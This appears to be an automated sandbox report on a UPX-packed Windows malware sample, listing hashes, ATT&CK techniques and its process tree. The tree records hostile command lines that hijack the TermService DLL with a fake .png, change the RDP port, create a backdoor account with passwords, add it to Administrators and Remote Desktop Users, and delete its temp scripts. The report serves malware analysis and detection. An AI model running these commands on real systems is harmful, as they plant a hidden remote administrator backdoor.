668cb262f0e7473c0bd4b254463671acc74502e7e45a450ec5421a217cea3671

General

Target

668cb262f0e7473c0bd4b254463671acc74502e7e45a450ec5421a217cea3671.exe
Size

3.1MB
MD5

7f18a2b5f73d5a3b257506d2a899409f
SHA1

07a521fdbd2c61aba059a7b4731658d9ea993d06
SHA256

668cb262f0e7473c0bd4b254463671acc74502e7e45a450ec5421a217cea3671
SHA512

e3260e9de862aeb3609db9488c0e34aa541f784e668085be8991d09e48a4659805953a8af0cdc4f975c8b55f37cac3f4b33b159ce9cd44f260f4c80ed0f0ea6b

Score

9^/10

persistence upx

Malware Config

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Windows\Branding\mediasrv.png	upx
\Windows\Branding\mediasvc.png	upx

Loads dropped DLL 2 IoCs

Processes:

pid process

2464
2464

pid	process
2464
2464

Modifies service 2 TTPs 2 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters	reg.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Drops file in Windows directory 8 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2544 reg.exe
Runs net.exe

pid	process
2544	reg.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2592	powershell.exe
2592	powershell.exe
2592	powershell.exe
1568	powershell.exe
1568	powershell.exe
1568	powershell.exe
2732	powershell.exe
2732	powershell.exe
2732	powershell.exe
360	powershell.exe
360	powershell.exe
360	powershell.exe
2592	powershell.exe
2592	powershell.exe
2592	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

624
624

pid	process
624
624

Suspicious use of AdjustPrivilegeToken 67 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2592	powershell.exe
Token: SeDebugPrivilege	1568	powershell.exe
Token: SeDebugPrivilege	2732	powershell.exe
Token: SeDebugPrivilege	360	powershell.exe
Token: SeIncreaseQuotaPrivilege	1568	powershell.exe
Token: SeSecurityPrivilege	1568	powershell.exe
Token: SeTakeOwnershipPrivilege	1568	powershell.exe
Token: SeLoadDriverPrivilege	1568	powershell.exe
Token: SeSystemProfilePrivilege	1568	powershell.exe
Token: SeSystemtimePrivilege	1568	powershell.exe
Token: SeProfSingleProcessPrivilege	1568	powershell.exe
Token: SeIncBasePriorityPrivilege	1568	powershell.exe
Token: SeCreatePagefilePrivilege	1568	powershell.exe
Token: SeBackupPrivilege	1568	powershell.exe
Token: SeRestorePrivilege	1568	powershell.exe
Token: SeShutdownPrivilege	1568	powershell.exe
Token: SeDebugPrivilege	1568	powershell.exe
Token: SeSystemEnvironmentPrivilege	1568	powershell.exe
Token: SeRemoteShutdownPrivilege	1568	powershell.exe
Token: SeUndockPrivilege	1568	powershell.exe
Token: SeManageVolumePrivilege	1568	powershell.exe
Token: 33	1568	powershell.exe
Token: 34	1568	powershell.exe
Token: 35	1568	powershell.exe
Token: 36	1568	powershell.exe
Token: SeIncreaseQuotaPrivilege	360	powershell.exe
Token: SeSecurityPrivilege	360	powershell.exe
Token: SeTakeOwnershipPrivilege	360	powershell.exe
Token: SeLoadDriverPrivilege	360	powershell.exe
Token: SeSystemProfilePrivilege	360	powershell.exe
Token: SeSystemtimePrivilege	360	powershell.exe
Token: SeProfSingleProcessPrivilege	360	powershell.exe
Token: SeIncBasePriorityPrivilege	360	powershell.exe
Token: SeCreatePagefilePrivilege	360	powershell.exe
Token: SeBackupPrivilege	360	powershell.exe
Token: SeRestorePrivilege	360	powershell.exe
Token: SeShutdownPrivilege	360	powershell.exe
Token: SeDebugPrivilege	360	powershell.exe
Token: SeSystemEnvironmentPrivilege	360	powershell.exe
Token: SeRemoteShutdownPrivilege	360	powershell.exe
Token: SeUndockPrivilege	360	powershell.exe
Token: SeManageVolumePrivilege	360	powershell.exe
Token: 33	360	powershell.exe
Token: 34	360	powershell.exe
Token: 35	360	powershell.exe
Token: 36	360	powershell.exe
Token: SeIncreaseQuotaPrivilege	2732	powershell.exe
Token: SeSecurityPrivilege	2732	powershell.exe
Token: SeTakeOwnershipPrivilege	2732	powershell.exe
Token: SeLoadDriverPrivilege	2732	powershell.exe
Token: SeSystemProfilePrivilege	2732	powershell.exe
Token: SeSystemtimePrivilege	2732	powershell.exe
Token: SeProfSingleProcessPrivilege	2732	powershell.exe
Token: SeIncBasePriorityPrivilege	2732	powershell.exe
Token: SeCreatePagefilePrivilege	2732	powershell.exe
Token: SeBackupPrivilege	2732	powershell.exe
Token: SeRestorePrivilege	2732	powershell.exe
Token: SeShutdownPrivilege	2732	powershell.exe
Token: SeDebugPrivilege	2732	powershell.exe
Token: SeSystemEnvironmentPrivilege	2732	powershell.exe
Token: SeRemoteShutdownPrivilege	2732	powershell.exe
Token: SeUndockPrivilege	2732	powershell.exe
Token: SeManageVolumePrivilege	2732	powershell.exe
Token: 33	2732	powershell.exe

Suspicious use of WriteProcessMemory 70 IoCs

Processes:

668cb262f0e7473c0bd4b254463671acc74502e7e45a450ec5421a217cea3671.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.exe

description	pid	process	target process
PID 1304 wrote to memory of 2592	1304	668cb262f0e7473c0bd4b254463671acc74502e7e45a450ec5421a217cea3671.exe	powershell.exe
PID 1304 wrote to memory of 2592	1304	668cb262f0e7473c0bd4b254463671acc74502e7e45a450ec5421a217cea3671.exe	powershell.exe
PID 2592 wrote to memory of 1548	2592	powershell.exe	csc.exe
PID 2592 wrote to memory of 1548	2592	powershell.exe	csc.exe
PID 1548 wrote to memory of 360	1548	csc.exe	cvtres.exe
PID 1548 wrote to memory of 360	1548	csc.exe	cvtres.exe
PID 2592 wrote to memory of 1568	2592	powershell.exe	powershell.exe
PID 2592 wrote to memory of 1568	2592	powershell.exe	powershell.exe
PID 2592 wrote to memory of 2732	2592	powershell.exe	powershell.exe
PID 2592 wrote to memory of 2732	2592	powershell.exe	powershell.exe
PID 2592 wrote to memory of 360	2592	powershell.exe	powershell.exe
PID 2592 wrote to memory of 360	2592	powershell.exe	powershell.exe
PID 2592 wrote to memory of 560	2592	powershell.exe	reg.exe
PID 2592 wrote to memory of 560	2592	powershell.exe	reg.exe
PID 2592 wrote to memory of 2544	2592	powershell.exe	reg.exe
PID 2592 wrote to memory of 2544	2592	powershell.exe	reg.exe
PID 2592 wrote to memory of 3976	2592	powershell.exe	reg.exe
PID 2592 wrote to memory of 3976	2592	powershell.exe	reg.exe
PID 2592 wrote to memory of 2568	2592	powershell.exe	net.exe
PID 2592 wrote to memory of 2568	2592	powershell.exe	net.exe
PID 2568 wrote to memory of 2160	2568	net.exe	net1.exe
PID 2568 wrote to memory of 2160	2568	net.exe	net1.exe
PID 2592 wrote to memory of 1272	2592	powershell.exe	cmd.exe
PID 2592 wrote to memory of 1272	2592	powershell.exe	cmd.exe
PID 1272 wrote to memory of 2112	1272	cmd.exe	cmd.exe
PID 1272 wrote to memory of 2112	1272	cmd.exe	cmd.exe
PID 2112 wrote to memory of 360	2112	cmd.exe	net.exe
PID 2112 wrote to memory of 360	2112	cmd.exe	net.exe
PID 360 wrote to memory of 2596	360	net.exe	net1.exe
PID 360 wrote to memory of 2596	360	net.exe	net1.exe
PID 2592 wrote to memory of 796	2592	powershell.exe	cmd.exe
PID 2592 wrote to memory of 796	2592	powershell.exe	cmd.exe
PID 796 wrote to memory of 1524	796	cmd.exe	cmd.exe
PID 796 wrote to memory of 1524	796	cmd.exe	cmd.exe
PID 1524 wrote to memory of 500	1524	cmd.exe	net.exe
PID 1524 wrote to memory of 500	1524	cmd.exe	net.exe
PID 500 wrote to memory of 2584	500	net.exe	net1.exe
PID 500 wrote to memory of 2584	500	net.exe	net1.exe
PID 1564 wrote to memory of 2160	1564	cmd.exe	net.exe
PID 1564 wrote to memory of 2160	1564	cmd.exe	net.exe
PID 2160 wrote to memory of 2068	2160	net.exe	net1.exe
PID 2160 wrote to memory of 2068	2160	net.exe	net1.exe
PID 2576 wrote to memory of 416	2576	cmd.exe	net.exe
PID 2576 wrote to memory of 416	2576	cmd.exe	net.exe
PID 416 wrote to memory of 2240	416	net.exe	net1.exe
PID 416 wrote to memory of 2240	416	net.exe	net1.exe
PID 1572 wrote to memory of 3928	1572	cmd.exe	net.exe
PID 1572 wrote to memory of 3928	1572	cmd.exe	net.exe
PID 3928 wrote to memory of 2144	3928	net.exe	net1.exe
PID 3928 wrote to memory of 2144	3928	net.exe	net1.exe
PID 2096 wrote to memory of 2100	2096	cmd.exe	net.exe
PID 2096 wrote to memory of 2100	2096	cmd.exe	net.exe
PID 2100 wrote to memory of 2136	2100	net.exe	net1.exe
PID 2100 wrote to memory of 2136	2100	net.exe	net1.exe
PID 2116 wrote to memory of 2416	2116	cmd.exe	net.exe
PID 2116 wrote to memory of 2416	2116	cmd.exe	net.exe
PID 2416 wrote to memory of 2568	2416	net.exe	net1.exe
PID 2416 wrote to memory of 2568	2416	net.exe	net1.exe
PID 1768 wrote to memory of 3400	1768	cmd.exe	net.exe
PID 1768 wrote to memory of 3400	1768	cmd.exe	net.exe
PID 3400 wrote to memory of 2268	3400	net.exe	net1.exe
PID 3400 wrote to memory of 2268	3400	net.exe	net1.exe
PID 2592 wrote to memory of 1120	2592	powershell.exe	cmd.exe
PID 2592 wrote to memory of 1120	2592	powershell.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\668cb262f0e7473c0bd4b254463671acc74502e7e45a450ec5421a217cea3671.exe
"C:\Users\Admin\AppData\Local\Temp\668cb262f0e7473c0bd4b254463671acc74502e7e45a450ec5421a217cea3671.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1304

\??\c:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
-ep bypass -noexit -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2592

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kzc5igy0\kzc5igy0.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:1548

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES91A7.tmp" "c:\Users\Admin\AppData\Local\Temp\kzc5igy0\CSC3F453D1AC62B4339B3BAB03DA4811FC0.TMP"
4⤵
PID:360

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1568

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2732

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:360

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
3⤵
PID:560

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
3⤵
- Modifies service
- Modifies registry key
PID:2544

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
3⤵
PID:3976

C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
3⤵
- Suspicious use of WriteProcessMemory
PID:2568

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
4⤵
PID:2160

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
3⤵
- Suspicious use of WriteProcessMemory
PID:1272

C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
4⤵
- Suspicious use of WriteProcessMemory
PID:2112

C:\Windows\system32\net.exe
net start rdpdr
5⤵
- Suspicious use of WriteProcessMemory
PID:360

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
6⤵
PID:2596

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
3⤵
- Suspicious use of WriteProcessMemory
PID:796

C:\Windows\system32\cmd.exe
cmd /c net start TermService
4⤵
- Suspicious use of WriteProcessMemory
PID:1524

C:\Windows\system32\net.exe
net start TermService
5⤵
- Suspicious use of WriteProcessMemory
PID:500

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
6⤵
PID:2584

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
3⤵
PID:1120

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
3⤵
PID:3408

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc Ghar4f5 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:1564

C:\Windows\system32\net.exe
net.exe user wgautilacc Ghar4f5 /del
2⤵
- Suspicious use of WriteProcessMemory
PID:2160

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
3⤵
PID:2068

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc tnNCKq0b /add
1⤵
- Suspicious use of WriteProcessMemory
PID:2576

C:\Windows\system32\net.exe
net.exe user wgautilacc tnNCKq0b /add
2⤵
- Suspicious use of WriteProcessMemory
PID:416

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc tnNCKq0b /add
3⤵
PID:2240

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:1572

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:3928

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
3⤵
PID:2144

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:2096

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:2100

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD
3⤵
PID:2136

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:2116

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" wgautilacc /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:2416

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
3⤵
PID:2568

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc tnNCKq0b
1⤵
- Suspicious use of WriteProcessMemory
PID:1768

C:\Windows\system32\net.exe
net.exe user wgautilacc tnNCKq0b
2⤵
- Suspicious use of WriteProcessMemory
PID:3400

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc tnNCKq0b
3⤵
PID:2268

C:\Windows\System32\cmd.exe
cmd.exe /C net user wgautilacc 1234
1⤵
PID:2112

C:\Windows\system32\net.exe
net user wgautilacc 1234
2⤵
PID:1620

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc 1234
3⤵
PID:416

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Account Manipulation

1

T1098

Registry Run Keys / Startup Folder

1

T1060

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Modify Registry

3

T1112

Credential Access

Discovery

Lateral Movement

Remote Desktop Protocol

1

T1076

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES91A7.tmp
MD5
53d6f4b28e5ecf324f1d9917546f70ec

SHA1
77bdc9b7366c9bc6cdd71a9305ee1e3cc352f9f4

SHA256
26ad2a6aea853ad47ec29e67f6a700aca7666003134acb0767211d264c0507d0

SHA512
6e6eea503ba843756e4fd94260559a256bcdbb3eb17456181c8bcb1649c9c35d727b2a1f1d634993a7d5c3d8d19f37f20f1fb0729b0b91979b16334cac127ed2

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-points.ps1
MD5
41d1a9d1cbee90f1e5f27fdfb299f8b8

SHA1
1e9ac27006a7c364649265246fccbd719418ceab

SHA256
0f6c089b4cefa4a454150f08519573283b1a38e2c19cd7b04855a05d686d41b4

SHA512
f178f88d0491cf72c3d4d591ab1d428691474a4c443822a0d270555c9dc4d05932057847b0e7106d564e6c9ddb33c0649e472258afca10696edc3dbb00f33422

Download Submit
C:\Users\Admin\AppData\Local\Temp\kzc5igy0\kzc5igy0.dll
MD5
e3e64e44fb5baf9e5bcad1d290446caf

SHA1
50ee8f4601ea2b614c98cf5f530fa07326f5ae71

SHA256
fce939eb2f960a401aeb0f54116c9fd286fde0e11be62a3cab0a891192b8e1bb

SHA512
db027348b409b11f6073a923108e001906bdb8b5f76c8ef162af960ff607abe3e6ea22e6e06fbf4a460d319abf19936a16a5dadc814812f2822892725df92a78

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kzc5igy0\CSC3F453D1AC62B4339B3BAB03DA4811FC0.TMP
MD5
74adc5ffbac9b9c909a1110b54ba3146

SHA1
bcaa51aed80f047b85a70bf494f22d04a83dd42d

SHA256
8012489cb71587c5585cfc83da12db7a86a263fac4ba0b5c8a9d5eb6916a10bd

SHA512
29fc57e7a252c1d67738677397f3a379cc40da9db7bf6dd36e5660eadc1cc9be48e5a08c8313ee50b00a887d00953a207ae72999ffa73f5c68148670e5f6ed2d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kzc5igy0\kzc5igy0.0.cs
MD5
8e55cb0ca998472ab6d3e295e0c4dd50

SHA1
407d07a29b89fc3afc246c0680d5857e3f51019d

SHA256
63e03eacae29a0d2187103f57a01a5e92ecb3b83a0452e05926303ab57a86685

SHA512
c51982ecdad9a366544cfb68a52808f6a54ed45c1e5b384c0ac5354fe713c18a16c90ee57e0d018caad02f7f293677c62f4c8a9a51bdea143f3afe593172bd28

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kzc5igy0\kzc5igy0.cmdline
MD5
cc3dd6dc5f5c6baf6b6e2b0c60454415

SHA1
0bc421b82555cf63261f1aeef6f33df09a9a8b2e

SHA256
105d56d6d7e2409ae2d3943ebed43aca382b0d945a8a6b2eeb0fdcf65bc7816b

SHA512
6c1b8906ee640a9ac68530e3a4aa0e0a3cb4ea20deb8cc4acf3a5303690a5fe01974d8df5f38fcf41d9ec34a3441672608b2588e5b0068b5bff0082e17903972

Download Submit
\Windows\Branding\mediasrv.png
MD5
37fb7ba711ffbe9d6ebb27d54e827966

SHA1
4d4d9303e011bcb14720b24239a1aacd58122f47

SHA256
81b857da0878a957125253a0a5eb80d64c7ab9826797304813d8ed3c3e7f84c5

SHA512
3f0358b9e7d89fba96e6e9bbe804c26b886a4678a6aa49bc2e784bf180b86c863e3e9a54da71f6856f5b4bb7d28b4e56269dbf31015fdba3b4b808eb66e3aedf

Download Submit
\Windows\Branding\mediasvc.png
MD5
2f916498a393e2f0d008d33a74c062ba

SHA1
404d52d4253ef3843ae3f2c4aff050f37fcd3f08

SHA256
d5038b5227bc35e157dd225c7bb54f0bcf3ba8d8b48cbb930b4ccb65c23d3412

SHA512
d952a820a966c6cadc1750947d053d01e4e6476d074b6cd460555cc9f8417bd7412beebb65cfa8a121edcce9aab110a5909251146fce703d1b4e984788486f10

Download Submit
memory/360-11-0x0000000000000000-mapping.dmp

Download
memory/360-25-0x0000000000000000-mapping.dmp

Download
memory/360-37-0x0000000000000000-mapping.dmp

Download
memory/360-27-0x00007FF8D8C10000-0x00007FF8D95FC000-memory.dmp

Filesize
9.9MB

Download
memory/416-47-0x0000000000000000-mapping.dmp

Download
memory/416-60-0x0000000000000000-mapping.dmp

Download
memory/500-41-0x0000000000000000-mapping.dmp

Download
memory/560-30-0x0000000000000000-mapping.dmp

Download
memory/796-39-0x0000000000000000-mapping.dmp

Download
memory/1120-57-0x0000000000000000-mapping.dmp

Download
memory/1272-35-0x0000000000000000-mapping.dmp

Download
memory/1304-1-0x0000000000D90000-0x0000000000D91000-memory.dmp

Filesize
4KB

Download
memory/1524-40-0x0000000000000000-mapping.dmp

Download
memory/1548-8-0x0000000000000000-mapping.dmp

Download
memory/1568-19-0x00007FF8D8C10000-0x00007FF8D95FC000-memory.dmp

Filesize
9.9MB

Download
memory/1568-18-0x0000000000000000-mapping.dmp

Download
memory/1620-59-0x0000000000000000-mapping.dmp

Download
memory/2068-46-0x0000000000000000-mapping.dmp

Download
memory/2100-51-0x0000000000000000-mapping.dmp

Download
memory/2112-36-0x0000000000000000-mapping.dmp

Download
memory/2136-52-0x0000000000000000-mapping.dmp

Download
memory/2144-50-0x0000000000000000-mapping.dmp

Download
memory/2160-34-0x0000000000000000-mapping.dmp

Download
memory/2160-45-0x0000000000000000-mapping.dmp

Download
memory/2240-48-0x0000000000000000-mapping.dmp

Download
memory/2268-56-0x0000000000000000-mapping.dmp

Download
memory/2416-53-0x0000000000000000-mapping.dmp

Download
memory/2544-31-0x0000000000000000-mapping.dmp

Download
memory/2568-33-0x0000000000000000-mapping.dmp

Download
memory/2568-54-0x0000000000000000-mapping.dmp

Download
memory/2584-42-0x0000000000000000-mapping.dmp

Download
memory/2592-5-0x000001AA56120000-0x000001AA56121000-memory.dmp

Filesize
4KB

Download
memory/2592-4-0x000001AA55FB0000-0x000001AA55FB1000-memory.dmp

Filesize
4KB

Download
memory/2592-15-0x000001AA56100000-0x000001AA56101000-memory.dmp

Filesize
4KB

Download
memory/2592-2-0x0000000000000000-mapping.dmp

Download
memory/2592-16-0x000001AA5E860000-0x000001AA5E861000-memory.dmp

Filesize
4KB

Download
memory/2592-17-0x000001AA5EBF0000-0x000001AA5EBF1000-memory.dmp

Filesize
4KB

Download
memory/2592-3-0x00007FF8D8C10000-0x00007FF8D95FC000-memory.dmp

Filesize
9.9MB

Download
memory/2592-6-0x000001AA56590000-0x000001AA56591000-memory.dmp

Filesize
4KB

Download
memory/2596-38-0x0000000000000000-mapping.dmp

Download
memory/2732-23-0x00007FF8D8C10000-0x00007FF8D95FC000-memory.dmp

Filesize
9.9MB

Download
memory/2732-21-0x0000000000000000-mapping.dmp

Download
memory/3400-55-0x0000000000000000-mapping.dmp

Download
memory/3408-58-0x0000000000000000-mapping.dmp

Download
memory/3928-49-0x0000000000000000-mapping.dmp

Download
memory/3976-32-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads